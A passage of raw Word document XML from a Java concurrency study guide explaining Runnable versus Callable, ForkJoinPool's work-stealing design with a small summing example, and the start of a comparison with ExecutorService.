          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you don't need a result, and the task doesn’t need to throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB2769C" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you need a result from the task or when the task might throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D08D9" w14:textId="77777777" w:rsidR="00B17D3F" w:rsidRPr="004E218C" w:rsidRDefault="00B17D3F" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The key difference lies in the return type and exception handling. Runnable is a simpler option when you just want to run a task without needing a result, while Callable is more flexible when you need to handle results or exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A222478" w14:textId="1E66E6D9" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="1985003D">
          <v:rect id="_x0000_i1829" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55932562" w14:textId="57287523" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00E57F37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="272" w:name="_Toc196307752"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is ForkJoinPool in Java and how does it differ from normal </w:t>
      </w:r>
      <w:r w:rsidR="008C0D7E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D7F99" w14:textId="05F0AFA9" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4F06A"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The ForkJoinPool is a specialized implementation of the ExecutorService designed for parallel programming in Java. It is primarily used to handle tasks that can be broken into smaller subtasks and executed concurrently. The ForkJoinPool utilizes a work-stealing algorithm to efficiently balance the workload among multiple threads, enabling better performance in parallel processing scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447F890" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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Key Features of ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28176F13" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Work Stealing Algorithm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CFFAD" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In ForkJoinPool, when a thread finishes executing its task, it can "steal" work from other threads' task queues. This helps keep all threads busy and improves overall throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9462B" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RecursiveTask and RecursiveAction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5D3E8" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool uses two key classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F67E3" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RecursiveTask&lt;V&gt;: A subclass of ForkJoinTask that computes a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C214C00" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RecursiveAction: A subclass of ForkJoinTask that does not return a result but performs some computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646D825A" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Parallelism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E952E" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The pool allows tasks to be recursively split into smaller tasks (forked) and recombined (joined). This approach is ideal for divide-and-conquer problems like sorting, matrix multiplication, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1DE16D" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Optimized for Divide-and-Conquer Algorithms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DD2AA" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1141"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool is optimized for tasks that can be broken into smaller tasks recursively (like recursive algorithms), as the framework ensures efficient task execution by splitting tasks across multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496782D9" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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Usage of ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2313966D"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lastRenderedPageBreak/>
        <w:t>To submit tasks to a ForkJoinPool, you typically use ForkJoinTask subclasses (RecursiveTask for tasks that return a result and RecursiveAction for tasks that do not return a result). You can also use ForkJoinPool.commonPool() to get a default shared pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E9409" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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Example of ForkJoinPool Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001FF34"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import java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A830E0" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A67EA0C"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public class ForkJoinPoolExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AC50C"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B62C68"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ForkJoinPool forkJoinPool = new ForkJoinPool();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD283D2" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1317FAD0"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Task that adds numbers recursively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDCA24"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RecursiveTask&lt;Integer&gt; task = new RecursiveTask&lt;Integer&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384092FB"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053811A"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rotected Integer compute() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C74B9"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int sum = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D66B27A"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Example base case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9C0EB"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for (int i = 1; i &lt;= 10; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CAE5F7"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um += i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE51278"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780241FC"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return sum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AA49D3"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64DEDF12"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552090F3"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5D65AB31"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Integer result = forkJoinPool.invoke(task);  // Executes the task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20656CBD"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Sum: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0964C0"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forkJoinPool.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B0EA3"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1B1D6AD8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52989C09" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="418F1C36">
          <v:rect id="_x0000_i1830" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A6EE9E" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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ForkJoinPool vs ExecutorService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761D0C12"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Both ForkJoinPool and the regular ExecutorService are part of the java.util.concurrent package, but they have different purposes and characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365053A" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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1. Purpose and Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586511E" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2DDF0" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Designed for general-purpose task execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56692B8F" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It is suited for tasks that don’t necessarily need to be recursively split or are not inherently parallelizable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8F208" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Regular ExecutorService tasks are submitted as independent tasks, and threads from a fixed pool or a cached pool execute them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129D1A8" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CEF13" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Designed for parallel tasks that can be split into smaller subtasks (divide-and-conquer tasks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C8BF5" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It optimizes recursive tasks by using work-stealing to balance the load across threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A230F6" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1142"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best suited for parallel recursive algorithms that involve breaking a problem into smaller subproblems and then combining the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D2A0D" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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2. Thread Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19832904" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
